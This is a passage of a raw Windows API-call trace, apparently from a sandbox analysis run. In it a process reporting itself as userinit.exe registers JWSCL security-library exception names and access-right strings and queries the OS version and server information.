[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2a8f810*="EJwsclFirewallProfileInitException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2a8f7f8*="EJwsclFirewallInitException") returned 1
[0140.236] SysReAllocStringLen (in: pbstr=0x2a8f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2a8f7e0*="EJwsclGenericFirewallException") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2a8f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2a8f7b0*="EJwsclInvalidRegistryPath") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2a8f798*="EJwsclEndOfStream") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2a8f780*="EJwsclClassTypeMismatch") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2a8f768*="EJwsclInvalidHandle") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2a8f750*="EJwsclInvalidIndex") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2a8f738*="EJwsclInvalidSession") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2a8f720*="EJwsclMissingEvent") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2a8f708*="EJwsclInvalidPointerType") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2a8f6f0*="EJwsclCreateProcessFailed") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2a8f6d8*="EJwsclNilPointer") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2a8f6c0*="EJwsclUnimplemented") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2a8f6a8*="EJwsclInitWellKnownException") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2a8f690*="EJwsclKeyApiException") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2a8f678*="EJwsclKeyException") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2a8f660*="EJwsclHashApiException") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2a8f648*="EJwsclHashException") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2a8f630*="EJwsclCSPApiException") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2a8f618*="EJwsclCSPException") returned 1
[0140.237] SysReAllocStringLen (in: pbstr=0x2a8f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2a8f600*="EJwsclTerminalSessionException") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2a8f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2a8f5d0*="EJwsclTerminalServiceException") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2a8f5b8*="EJwsclTerminalServerConnectException") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2a8f5a0*="EJwsclTerminalServerException") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2a8f588*="EJwsclCryptUnsupportedException") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2a8f570*="EJwsclCryptApiException") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2a8f558*="EJwsclCryptException") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2a8f540*="EJwsclOSError") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2a8f528*="EJwsclResourceInitFailed") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2a8f510*="EJwsclResourceUnequalCount") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2a8f4f8*="EJwsclResourceNotFound") returned 1
[0140.284] SysReAllocStringLen (in: pbstr=0x2a8f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2a8f4e0*="EJwsclResourceException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2a8f4c8*="EJwsclFailedAddACE") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2a8f4b0*="EJwsclUnsupportedACE") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2a8f498*="EJwsclOpenWindowStationException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2a8f480*="EJwsclWindowStationException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2a8f468*="EJwsclCloseDesktopException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2a8f450*="EJwsclCreateDesktopException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2a8f438*="EJwsclOpenDesktopException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2a8f420*="EJwsclDesktopException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2a8f408*="EJwsclSACLAccessDenied") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2a8f3f0*="EJwsclAccessDenied") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2a8f3d8*="EJwsclLSAException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2a8f3c0*="ESetOwnerException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2a8f3a8*="ESetSecurityException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2a8f390*="EJwsclInvalidParentDescriptor") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2a8f378*="EJwsclInvalidKeyPath") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2a8f360*="EJwsclInvalidGenericAccessMask") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2a8f348*="EJwsclAdaptSecurityInfoException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2a8f330*="EJwsclThreadException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2a8f318*="EJwsclInvalidObjectException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2a8f300*="EJwsclSecurityObjectException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2a8f2e8*="EJwsclHashMismatch") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2a8f2d0*="EJwsclStreamHashException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2a8f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2a8f2a0*="EJwsclStreamSizeException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2a8f288*="EJwsclStreamException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2a8f270*="EJwsclNoSuchLogonSession") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2a8f258*="EJwsclInvalidFlagsException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2a8f240*="EJwsclProcessNotFound") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2a8f228*="EJwsclInvalidParameterException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2a8f210*="EJwsclInvalidPathException") returned 1
[0140.285] SysReAllocStringLen (in: pbstr=0x2a8f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2a8f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2a8f1e0*="EJwsclInvalidRevision") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2a8f1c8*="EJwsclInvalidAceMismatch") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2a8f1b0*="EJwsclRevisionMismatchException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2a8f198*="EJwsclInvalidACEException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2a8f180*="EJwsclReadOnlyPropertyException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2a8f168*="EJwsclDuplicateListEntryException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2a8f150*="EJwsclIndexOutOfBoundsException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2a8f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2a8f120*="EJwsclInvalidKnownSIDException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2a8f108*="EJwsclInvalidComputer") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2a8f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2a8f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2a8f0c0*="EJwsclInvalidSIDException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2a8f0a8*="EJwsclInvalidSecurityListException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2a8f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2a8f078*="EJwsclEmptyACLException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2a8f060*="EJwsclNILParameterException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2a8f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2a8f030*="EJwsclInvalidObjectArrayException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2a8f018*="EJwsclProcessIdNotAvailable") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2a8f000*="EJwsclWinCallFailedException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2a8efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2a8efd0*="EJwsclNotImplementedException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2a8efb8*="EJwsclAccessTypeException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2a8efa0*="EJwsclAdjustPrivilegeException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2a8ef88*="EJwsclPrivilegeCheckException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2a8ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2a8ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2a8ef40*="EJwsclPrivilegeException") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2a8ef28*="EJwsclNotEnoughMemory") returned 1
[0140.286] SysReAllocStringLen (in: pbstr=0x2a8ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2a8ef10*="EJwsclInvalidTokenHandle") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2a8eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2a8eee0*="EJwsclDuplicateTokenException") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2a8eec8*="EJwsclInvalidOwnerException") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2a8eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2a8ee98*="EJwsclTokenPrimaryException") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2a8ee80*="EJwsclTokenImpersonationException") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2a8ee68*="EJwsclTokenInformationException") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2a8ee50*="EJwsclSharedTokenException") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2a8ee38*="EJwsclOpenProcessTokenException") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2a8ee20*="EJwsclOpenThreadTokenException") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2a8ee08*="EJwsclSecurityException") returned 1
[0140.287] SysReAllocStringLen (in: pbstr=0x2a8edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2a8edf0*="Exception") returned 1
[0140.287] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0140.287] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0140.287] GetVersionExA (in: lpVersionInformation=0x18f564*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x5a0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\x8c\xf5\x18") | out: lpVersionInformation=0x18f564*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0140.287] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0140.287] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0140.295] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0140.296] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x18f5e8 | out: bufptr=0x18f5e8) returned 0x0
[0140.331] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0140.332] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0140.332] NetApiBufferFree (Buffer=0x5c1d00) returned 0x0
[0140.332] SetErrorMode (uMode=0x8000) returned 0x1
[0140.332] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0140.332] SetErrorMode (uMode=0x1) returned 0x8000
[0140.332] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0140.333] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0140.335] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0140.336] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0140.337] SysReAllocStringLen (in: pbstr=0x2a8ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8ec40*="DELETE") returned 1
[0140.337] SysReAllocStringLen (in: pbstr=0x2a8ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8ec30*="READ_CONTROL") returned 1
[0140.337] SysReAllocStringLen (in: pbstr=0x2a8ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8ec20*="WRITE_OWNER") returned 1
[0140.337] SysReAllocStringLen (in: pbstr=0x2a8ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8ec10*="WRITE_DAC") returned 1
[0140.337] SysReAllocStringLen (in: pbstr=0x2a8ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2a8ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0140.337] SysReAllocStringLen (in: pbstr=0x2a8ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2a8ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0140.337] SysReAllocStringLen (in: pbstr=0x2a8ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2a8ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0140.337] SysReAllocStringLen (in: pbstr=0x2a8ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2a8ebd0*="FILE_WRITE_DATA") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2a8ebc0*="FILE_READ_DATA") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2a8ebb0*="FILE_ALL_ACCESS") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8eb80*="STANDARD_RIGHTS_READ") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8eb70*="STANDARD_RIGHTS_ALL") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8eb50*="DELETE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8eb40*="READ_CONTROL") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8eb30*="WRITE_OWNER") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8eb20*="WRITE_DAC") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2a8eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2a8eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2a8eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2a8eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2a8ead0*="TOKEN_QUERY_SOURCE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2a8eac0*="TOKEN_QUERY") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2a8eab0*="TOKEN_IMPERSONATE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2a8eaa0*="TOKEN_DUPLICATE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2a8ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2a8ea80*="TOKEN_ALL_ACCESS") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8ea50*="STANDARD_RIGHTS_READ") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8ea40*="STANDARD_RIGHTS_ALL") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8ea30*="DELETE") returned 1
[0140.338] SysReAllocStringLen (in: pbstr=0x2a8ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8ea20*="READ_CONTROL") returned 1
